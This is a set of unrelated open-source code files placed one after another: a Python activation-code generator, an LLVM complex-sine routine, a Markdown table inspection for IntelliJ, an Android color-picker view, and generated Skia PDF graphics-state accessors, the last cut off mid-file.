# Problem 0001: As an independent Apple Store app developer running a
# limited-time promotion, generate 200 activation codes (or coupons)
# for your application using Python.

import uuid


def create_code(num, length):
    """Generate ``num`` unique activation codes of ``length`` characters each.

    Each code is the first ``length`` hex characters of a uuid1() with the
    dashes removed, so at most 32 characters are available per code.
    Uniqueness is guaranteed by re-drawing on (extremely unlikely) collisions.

    :param num: number of codes to generate
    :param length: characters per code (effectively capped at 32)
    :return: list of ``num`` distinct code strings
    """
    result = []
    # Set mirror of `result` for O(1) duplicate checks (the original scanned
    # the list, which is O(n) per candidate).
    seen = set()
    while len(result) < num:
        code = str(uuid.uuid1()).replace('-', '')[:length]
        if code not in seen:
            seen.add(code)
            result.append(code)
    return result


# Parenthesized call works under both Python 2 (print statement with a single
# parenthesized expression) and Python 3 (print function); the original
# `print create_code(...)` was a SyntaxError on Python 3.
print(create_code(200, 20))
360
716
/*
 * Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
 * See https://llvm.org/LICENSE.txt for license information.
 * SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
 *
 */

#include "mthdecls.h"

/*
 * Single-precision complex sine. For z = real + i*imag this computes
 *
 *     sin(z) = sin(real) * cosh(imag)  +  i * cos(real) * sinh(imag)
 *
 * CMPLXFUNC_C / CMPLXARGS_C / CRETURN_F_F are macros from mthdecls.h that
 * expand to the platform-specific complex argument/return ABI handling.
 */
CMPLXFUNC_C(__mth_i_csin)
{
  CMPLXARGS_C;
  float x, y;
  /* x = SINF(real) * COSHF(imag); y = COSF(real) * SINHF(imag); */
  x = sinf(real);        /* real-part trig factor */
  y = cosf(real);        /* imaginary-part trig factor */
  x = x * coshf(imag);   /* scale by hyperbolic factors of imag */
  y = y * sinhf(imag);
  CRETURN_F_F(x, y);     /* return x + i*y */
}
217
921
// Copyright (c) 2015-2020 <NAME> <<EMAIL>>
// Use of this source code is governed by the Apache 2.0 license that can be
// found in the LICENSE file.

package com.vladsch.md.nav.inspections.table;

import com.intellij.codeInspection.InspectionManager;
import com.intellij.codeInspection.ProblemDescriptor;
import com.intellij.codeInspection.ProblemHighlightType;
import com.intellij.openapi.project.Project;
import com.intellij.psi.PsiElement;
import com.intellij.psi.PsiFile;
import com.vladsch.flexmark.ext.tables.TableExtractingVisitor;
import com.vladsch.flexmark.ext.tables.TablesExtension;
import com.vladsch.flexmark.util.ast.Document;
import com.vladsch.flexmark.util.data.MutableDataHolder;
import com.vladsch.flexmark.util.format.MarkdownTable;
import com.vladsch.flexmark.util.misc.Utils;
import com.vladsch.flexmark.util.sequence.BasedSequence;
import com.vladsch.flexmark.util.sequence.LineAppendable;
import com.vladsch.md.nav.MdBundle;
import com.vladsch.md.nav.MdFileType;
import com.vladsch.md.nav.actions.handlers.util.PsiEditAdjustment;
import com.vladsch.md.nav.annotator.ReplaceTextChangeQuickFix;
import com.vladsch.md.nav.inspections.LocalInspectionToolBase;
import com.vladsch.md.nav.inspections.ProblemDescriptors;
import com.vladsch.md.nav.parser.MdLexParserManager;
import com.vladsch.md.nav.psi.element.MdComposite;
import com.vladsch.md.nav.psi.element.MdFile;
import com.vladsch.md.nav.psi.element.MdTable;
import com.vladsch.md.nav.psi.util.BlockPrefixes;
import com.vladsch.md.nav.psi.util.MdPsiImplUtil;
import com.vladsch.md.nav.psi.util.MdTypes;
import com.vladsch.md.nav.settings.MdRenderingProfile;
import com.vladsch.md.nav.settings.MdRenderingProfileManager;
import com.vladsch.md.nav.settings.ParserOptions;
import com.vladsch.md.nav.util.format.FlexmarkFormatOptionsAdapter;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;

/**
 * Inspection that flags Markdown tables which are not compatible with GitHub's
 * table rendering: multi-row headers, inconsistent column counts across rows,
 * table captions, and column spans written as adjacent {@code ||} separators.
 * Each finding is reported with a quick fix where one can be computed.
 *
 * <p>Only active when the file's rendering profile has the
 * {@link ParserOptions#GFM_TABLE_RENDERING} parser option enabled.
 */
public class GitHubTableInspection extends LocalInspectionToolBase {
    @Nullable
    @Override
    public ProblemDescriptor[] checkFile(@NotNull PsiFile file, @NotNull InspectionManager manager, boolean isOnTheFly) {
        // Skip non-Markdown, invalid, or fenced-code-only content outright.
        if (file.getFileType() != MdFileType.INSTANCE || !file.isValid() || isIgnoreFencedCodeContent(file)) {
            return null;
        }

        final Project project = file.getProject();
        final MdRenderingProfile renderingProfile = MdRenderingProfileManager.getInstance(project).getRenderingProfile(file);
        // GFM table checks only make sense when GFM table rendering is selected.
        if (!renderingProfile.getParserSettings().anyOptions(ParserOptions.GFM_TABLE_RENDERING)) {
            return null;
        }

        final ProblemDescriptors problems = new ProblemDescriptors();
        final PsiEditAdjustment editContext = new PsiEditAdjustment(file);

        // Visit every MdTable element in the file.
        MdPsiImplUtil.findChildrenOfAnyType((MdFile) file, false, false, false, element -> {
            // Re-extract the table text with its block prefix (e.g. quote/list markers) removed
            // so flexmark can re-parse it in isolation.
            LineAppendable tableChars = editContext.getLineAppendable();
            tableChars.append(editContext.elementText(element)).line();
            MdPsiImplUtil.adjustLinePrefix(element, tableChars, editContext);

            Document root = MdLexParserManager.parseFlexmarkDocument(renderingProfile, tableChars.toString(false), true);
            if (root != null) {
                BlockPrefixes prefixes = MdPsiImplUtil.getBlockPrefixes(element, null, editContext).finalizePrefixes(editContext);
                BasedSequence childContPrefix = prefixes.getChildContPrefix();

                // Format options matching the element's text range; force missing columns
                // to be appended so the normalized table is rectangular.
                FlexmarkFormatOptionsAdapter flexmarkFormatOptionsAdapter = new FlexmarkFormatOptionsAdapter(editContext, element.getTextOffset(), element.getTextOffset() + element.getTextLength());
                MutableDataHolder formatOptions = flexmarkFormatOptionsAdapter.getTableFormatOptions("");
                formatOptions.set(TablesExtension.APPEND_MISSING_COLUMNS, true);

                TableExtractingVisitor tableVisitor = new TableExtractingVisitor(formatOptions);
                MarkdownTable[] tables = tableVisitor.getTables(root);
                if (tables.length > 0) {
                    MarkdownTable table = tables[0];
                    table.normalize();

                    // GitHub only supports a single header row.
                    if (table.header.rows.size() != 1) {
                        PsiElement tableHeader = MdPsiImplUtil.findNestedChildByType(element, MdTypes.TABLE_HEADER);
                        if (tableHeader != null) {
                            problems.add(manager.createProblemDescriptor(element,
                                    MdBundle.message("annotation.table.header-rows"), true, ProblemHighlightType.GENERIC_ERROR_OR_WARNING, isOnTheFly, problems.fixes()));
                        }
                    }

                    // Walk the PSI rows/cells to (a) count columns per row, (b) detect column
                    // spans (adjacent '|' separators), and (c) rebuild the table text with
                    // spaces inserted between span separators for the span quick fix.
                    int minColumns = Integer.MAX_VALUE;
                    int maxColumns = 0;
                    boolean hadColumnSpans = false;
                    StringBuilder tableText = new StringBuilder();
                    CharSequence sep = "";

                    for (PsiElement section : element.getChildren()) {
                        // A separator row is its own section; other sections contain row children.
                        for (PsiElement row : section.getNode().getElementType() == MdTypes.TABLE_SEPARATOR ? new PsiElement[] { section } : section.getChildren()) {
                            int columns = 0;
                            tableText.append(sep);
                            sep = "\n" + childContPrefix.toString();
                            for (PsiElement part : row.getChildren()) {
                                if (part instanceof MdComposite && part.getNode().getElementType() == MdTypes.TABLE_CELL) {
                                    // Keep the leading '|' (and indent) before the first cell.
                                    PsiElement leadSeparators = part.getPrevSibling();
                                    if (columns == 0 && leadSeparators != null) {
                                        tableText.append(leadSeparators.getText());
                                    }
                                    tableText.append(part.getText());

                                    // The trailing separator's length gives the column span:
                                    // "||" spans 2 columns, etc.
                                    PsiElement separators = part.getNextSibling();
                                    int colSpan = Utils.minLimit(1, separators == null ? 1 : separators.getTextLength());
                                    if (separators != null && colSpan > 1) {
                                        hadColumnSpans = true;
                                        // Rewrite "||…" as "| |…" so each column gets an (empty) cell.
                                        final StringBuilder sb = new StringBuilder();
                                        String sepCell = "";
                                        for (int i = 0; i < colSpan; i++) {
                                            sb.append(sepCell);
                                            sepCell = " ";
                                            sb.append('|');
                                        }
                                        tableText.append(sb);
                                    } else if (separators != null) {
                                        tableText.append(separators.getText().trim());
                                    }
                                    columns += colSpan;
                                }
                            }
                            if (minColumns > columns) minColumns = columns;
                            if (maxColumns < columns) maxColumns = columns;
                        }
                    }

                    int startOffset = element.getTextOffset();
                    int endOffset = startOffset + element.getTextLength();

                    // Rows with differing column counts: offer a reformat quick fix using the
                    // normalized flexmark table (missing columns were appended above).
                    if (minColumns != maxColumns) {
                        LineAppendable formattedTable = editContext.getLineAppendable();
                        table.appendTable(formattedTable);
                        MdPsiImplUtil.addLinePrefix(formattedTable, "", childContPrefix);
                        problems.add(new ReplaceTextChangeQuickFix(MdBundle.message("quickfix.reformat-table"), startOffset, endOffset, formattedTable.toString()));
                        problems.add(manager.createProblemDescriptor(element,
                                MdBundle.message("annotation.table.inconsistent-columns"), true, ProblemHighlightType.GENERIC_ERROR_OR_WARNING, isOnTheFly, problems.fixes()));
                    }

                    // Captions are not supported by GitHub: offer to delete the caption line.
                    PsiElement caption = MdPsiImplUtil.findNestedChildByType(element, MdTypes.TABLE_CAPTION);
                    if (caption != null) {
                        BasedSequence charSequence = editContext.getCharSequence();
                        int capStartOffset = charSequence.startOfLine(caption.getTextOffset());
                        int capEndOffset = charSequence.endOfLineAnyEOL(capStartOffset);
                        capEndOffset += charSequence.eolStartLength(capEndOffset);
                        problems.add(new ReplaceTextChangeQuickFix(MdBundle.message("annotation.table.caption-support.delete-caption"), capStartOffset, capEndOffset, ""));
                        problems.add(manager.createProblemDescriptor(caption, MdBundle.message("annotation.table.caption-support"), true, ProblemHighlightType.GENERIC_ERROR_OR_WARNING, isOnTheFly, problems.fixes()));
                        // make end offset for table the previous end of line
                        endOffset = Math.max(0, capStartOffset - charSequence.eolEndLength(capStartOffset));
                    }

                    if (hadColumnSpans) {
                        // need to add spaces between |
                        problems.add(new ReplaceTextChangeQuickFix(MdBundle.message("annotation.table.column-span.insert-space"), startOffset, endOffset, tableText.toString()));
                        problems.add(manager.createProblemDescriptor(element, MdBundle.message("annotation.table.column-span"), true, ProblemHighlightType.GENERIC_ERROR_OR_WARNING, isOnTheFly, problems.fixes()));
                    }
                }
            }
        }, MdTable.class);

        return problems.done();
    }
}
4,635
2,092
<reponame>GAndroidProject/MeiWidgetView<filename>widget/src/main/java/com/meis/widget/ColorPickerView.java package com.meis.widget; import android.content.Context; import android.graphics.Canvas; import android.graphics.Color; import android.graphics.ComposeShader; import android.graphics.Paint; import android.graphics.PorterDuff; import android.graphics.RadialGradient; import android.graphics.Shader; import android.graphics.SweepGradient; import android.support.annotation.Nullable; import android.util.AttributeSet; import android.view.MotionEvent; import android.view.View; import com.meis.widget.utils.DensityUtil; /** * Created by wenshi on 2018/4/27. * Description 颜色选择器 */ public class ColorPickerView extends View { //wrap_content 情况默认大小为 100dp private static int WARP_DEFAULT_SIZE = 100; private Paint mPaint; //手指的画笔 private Paint mFingerPaint; //宽高一半 的最小值 private int mPickerRadius; private int mCenterX; private int mCenterY; private int mFingerX; private int mFingerY; private int[] mGradientColors; private float[] colorHSV = new float[]{0f, 1f, 1f}; public ColorPickerView(Context context) { this(context, null); } public ColorPickerView(Context context, @Nullable AttributeSet attrs) { this(context, attrs, 0); } public ColorPickerView(Context context, @Nullable AttributeSet attrs, int defStyleAttr) { super(context, attrs, defStyleAttr); //关闭硬件加速 setLayerType(LAYER_TYPE_SOFTWARE, null); mPaint = new Paint(); mPaint.setAntiAlias(true); mFingerPaint = new Paint(); mFingerPaint.setColor(Color.WHITE); mFingerPaint.setAntiAlias(true); //获取到渐变的颜色数组 mGradientColors = getGradientColors(); } private int[] getGradientColors() { int colorCount = 12; int circleAngle = 360; int colorAngleStep = 360 / colorCount; int colors[] = new int[colorCount]; float hsv[] = new float[]{0f, 1f, 1f}; for (int i = 0; i < colors.length; i++) { hsv[0] = (i * colorAngleStep + circleAngle / 2) % circleAngle; colors[i] = Color.HSVToColor(hsv); } return colors; } private ComposeShader 
getPickerShader() { SweepGradient sweepGradient = new SweepGradient(mCenterX, mCenterY, mGradientColors, null); RadialGradient radialGradient = new RadialGradient(mCenterX, mCenterY, mPickerRadius, 0xFFFFFFFF, 0x00FFFFFF, Shader.TileMode.CLAMP); ComposeShader composeShader = new ComposeShader(sweepGradient, radialGradient, PorterDuff.Mode.SRC_OVER); return composeShader; } @Override protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) { super.onMeasure(widthMeasureSpec, heightMeasureSpec); int widthMode = MeasureSpec.getMode(widthMeasureSpec); int heightMode = MeasureSpec.getMode(heightMeasureSpec); int widthSize = MeasureSpec.getSize(widthMeasureSpec); int heightSize = MeasureSpec.getSize(heightMeasureSpec); int warpDefaultSize = DensityUtil.dip2px(getContext(), WARP_DEFAULT_SIZE); if (widthMode == MeasureSpec.AT_MOST && heightMode == MeasureSpec.AT_MOST) { widthSize = heightSize = warpDefaultSize; } else if (widthMode == MeasureSpec.AT_MOST) { widthSize = warpDefaultSize; } else if (heightMode == MeasureSpec.AT_MOST) { heightSize = warpDefaultSize; } setMeasuredDimension(widthSize, heightSize); } @Override protected void onSizeChanged(int w, int h, int oldw, int oldh) { super.onSizeChanged(w, h, oldw, oldh); mCenterX = w / 2; mCenterY = h / 2; mPickerRadius = Math.min(mCenterX, mCenterY); //获取选择器的渲染Shader mPaint.setShader(getPickerShader()); } @Override protected void onDraw(Canvas canvas) { super.onDraw(canvas); canvas.save(); canvas.drawCircle(mCenterX, mCenterY, mPickerRadius, mPaint); canvas.drawCircle(mFingerX, mFingerY, 10, mFingerPaint); canvas.restore(); } @Override public boolean onTouchEvent(MotionEvent event) { switch (event.getAction()) { case MotionEvent.ACTION_DOWN: case MotionEvent.ACTION_MOVE: int x = (int) event.getX(); int y = (int) event.getY(); //计算触摸点距离中心点的距离 int distance = (int) Math.sqrt((x - mCenterX) * (x - mCenterX) + (y - mCenterY) * (y - mCenterY)); if (distance <= mPickerRadius) { colorHSV[0] = (float) 
(Math.toDegrees(Math.atan2((y - mCenterY), (x - mCenterX))) + 180f); colorHSV[1] = Math.max(0f, Math.min(1f, (float) (distance / mPickerRadius))); mFingerY = y; mFingerX = x; postInvalidate(); } break; case MotionEvent.ACTION_UP: break; } return true; } public int getColor() { return Color.HSVToColor(colorHSV); } }
2,403
5,964
/*
 * Copyright 2013 Google Inc.
 * Use of this source code is governed by a BSD-style license that can be
 * found in the LICENSE file.
 */

#include "SkPdfGraphicsStateDictionary_autogen.h"
#include "SkPdfNativeDoc.h"

// Auto-generated accessors for a PDF graphics state parameter dictionary
// (an ExtGState dictionary — key meanings are defined by the PDF spec's
// graphics state parameter table; this file only encodes their types).
//
// Every accessor follows the same generated pattern:
//   * X(doc)       — fetch key "X", resolve indirect references through `doc`,
//                    return the typed value; falls back to a zero value
//                    (0 / false / SkString() / NULL) when absent or mistyped.
//   * isXAType(doc) — true when the (resolved) entry has that concrete type,
//                    used for keys that admit several types.
//   * getXAsType(doc) — typed fetch for one of those alternatives.
//   * has_X()      — raw presence check, no reference resolution.

// "Type" (name entry).
SkString SkPdfGraphicsStateDictionary::Type(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("Type", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkString(); }
bool SkPdfGraphicsStateDictionary::has_Type() const { return get("Type", "") != NULL; }

// "LW" (number entry).
double SkPdfGraphicsStateDictionary::LW(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("LW", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return 0; }
bool SkPdfGraphicsStateDictionary::has_LW() const { return get("LW", "") != NULL; }

// "LC" (integer entry).
int64_t SkPdfGraphicsStateDictionary::LC(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("LC", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isInteger()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->intValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return 0; }
bool SkPdfGraphicsStateDictionary::has_LC() const { return get("LC", "") != NULL; }

// "LJ" (integer entry).
int64_t SkPdfGraphicsStateDictionary::LJ(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("LJ", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isInteger()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->intValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return 0; }
bool SkPdfGraphicsStateDictionary::has_LJ() const { return get("LJ", "") != NULL; }

// "ML" (number entry).
double SkPdfGraphicsStateDictionary::ML(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("ML", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return 0; }
bool SkPdfGraphicsStateDictionary::has_ML() const { return get("ML", "") != NULL; }

// "D" (array entry).
SkPdfArray* SkPdfGraphicsStateDictionary::D(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("D", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isArray()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfArray*)ret;
  /* TODO(edisonn): warn about missing default value for optional fields */ return NULL; }
bool SkPdfGraphicsStateDictionary::has_D() const { return get("D", "") != NULL; }

// "RI" (name entry).
SkString SkPdfGraphicsStateDictionary::RI(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("RI", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkString(); }
bool SkPdfGraphicsStateDictionary::has_RI() const { return get("RI", "") != NULL; }

// "OP" and lowercase "op" (boolean entries; PDF key names are case-sensitive).
bool SkPdfGraphicsStateDictionary::OP(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("OP", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isBoolean()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->boolValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return false; }
bool SkPdfGraphicsStateDictionary::has_OP() const { return get("OP", "") != NULL; }
bool SkPdfGraphicsStateDictionary::op(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("op", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isBoolean()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->boolValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return false; }
bool SkPdfGraphicsStateDictionary::has_op() const { return get("op", "") != NULL; }

// "OPM" (integer entry).
int64_t SkPdfGraphicsStateDictionary::OPM(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("OPM", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isInteger()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->intValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return 0; }
bool SkPdfGraphicsStateDictionary::has_OPM() const { return get("OPM", "") != NULL; }

// "Font" (array entry).
SkPdfArray* SkPdfGraphicsStateDictionary::Font(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("Font", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isArray()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfArray*)ret;
  /* TODO(edisonn): warn about missing default value for optional fields */ return NULL; }
bool SkPdfGraphicsStateDictionary::has_Font() const { return get("Font", "") != NULL; }

// "BG" (function entry).
SkPdfFunction SkPdfGraphicsStateDictionary::BG(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BG", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkPdfFunction(); }
bool SkPdfGraphicsStateDictionary::has_BG() const { return get("BG", "") != NULL; }

// "BG2" (function or name).
bool SkPdfGraphicsStateDictionary::isBG2AFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BG2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isFunction(); }
SkPdfFunction SkPdfGraphicsStateDictionary::getBG2AsFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BG2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkPdfFunction(); }
bool SkPdfGraphicsStateDictionary::isBG2AName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BG2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); }
SkString SkPdfGraphicsStateDictionary::getBG2AsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BG2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkString(); }
bool SkPdfGraphicsStateDictionary::has_BG2() const { return get("BG2", "") != NULL; }

// "UCR" (function entry).
SkPdfFunction SkPdfGraphicsStateDictionary::UCR(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("UCR", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkPdfFunction(); }
bool SkPdfGraphicsStateDictionary::has_UCR() const { return get("UCR", "") != NULL; }

// "UCR2" (function or name).
bool SkPdfGraphicsStateDictionary::isUCR2AFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("UCR2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isFunction(); }
SkPdfFunction SkPdfGraphicsStateDictionary::getUCR2AsFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("UCR2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkPdfFunction(); }
bool SkPdfGraphicsStateDictionary::isUCR2AName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("UCR2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); }
SkString SkPdfGraphicsStateDictionary::getUCR2AsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("UCR2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkString(); }
bool SkPdfGraphicsStateDictionary::has_UCR2() const { return get("UCR2", "") != NULL; }

// "TR" (function, array, or name).
bool SkPdfGraphicsStateDictionary::isTRAFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isFunction(); }
SkPdfFunction SkPdfGraphicsStateDictionary::getTRAsFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkPdfFunction(); }
bool SkPdfGraphicsStateDictionary::isTRAArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isArray(); }
SkPdfArray* SkPdfGraphicsStateDictionary::getTRAsArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isArray()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfArray*)ret;
  /* TODO(edisonn): warn about missing default value for optional fields */ return NULL; }
bool SkPdfGraphicsStateDictionary::isTRAName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); }
SkString SkPdfGraphicsStateDictionary::getTRAsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkString(); }
bool SkPdfGraphicsStateDictionary::has_TR() const { return get("TR", "") != NULL; }

// "TR2" (function, array, or name).
bool SkPdfGraphicsStateDictionary::isTR2AFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isFunction(); }
SkPdfFunction SkPdfGraphicsStateDictionary::getTR2AsFunction(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isFunction()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->functionValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkPdfFunction(); }
bool SkPdfGraphicsStateDictionary::isTR2AArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isArray(); }
SkPdfArray* SkPdfGraphicsStateDictionary::getTR2AsArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isArray()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfArray*)ret;
  /* TODO(edisonn): warn about missing default value for optional fields */ return NULL; }
bool SkPdfGraphicsStateDictionary::isTR2AName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); }
SkString SkPdfGraphicsStateDictionary::getTR2AsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TR2", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkString(); }
bool SkPdfGraphicsStateDictionary::has_TR2() const { return get("TR2", "") != NULL; }

// "HT" (dictionary, stream, or name). Note the stream check uses hasStream(),
// not a type predicate like the others.
bool SkPdfGraphicsStateDictionary::isHTADictionary(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isDictionary(); }
SkPdfDictionary* SkPdfGraphicsStateDictionary::getHTAsDictionary(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isDictionary()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfDictionary*)ret;
  /* TODO(edisonn): warn about missing default value for optional fields */ return NULL; }
bool SkPdfGraphicsStateDictionary::isHTAStream(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->hasStream(); }
SkPdfStream* SkPdfGraphicsStateDictionary::getHTAsStream(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->hasStream()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->getStream();
  /* TODO(edisonn): warn about missing default value for optional fields */ return NULL; }
bool SkPdfGraphicsStateDictionary::isHTAName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); }
SkString SkPdfGraphicsStateDictionary::getHTAsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("HT", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkString(); }
bool SkPdfGraphicsStateDictionary::has_HT() const { return get("HT", "") != NULL; }

// "FL" (number entry).
double SkPdfGraphicsStateDictionary::FL(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("FL", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return 0; }
bool SkPdfGraphicsStateDictionary::has_FL() const { return get("FL", "") != NULL; }

// "SM" (number entry).
double SkPdfGraphicsStateDictionary::SM(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SM", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return 0; }
bool SkPdfGraphicsStateDictionary::has_SM() const { return get("SM", "") != NULL; }

// "SA" (boolean entry).
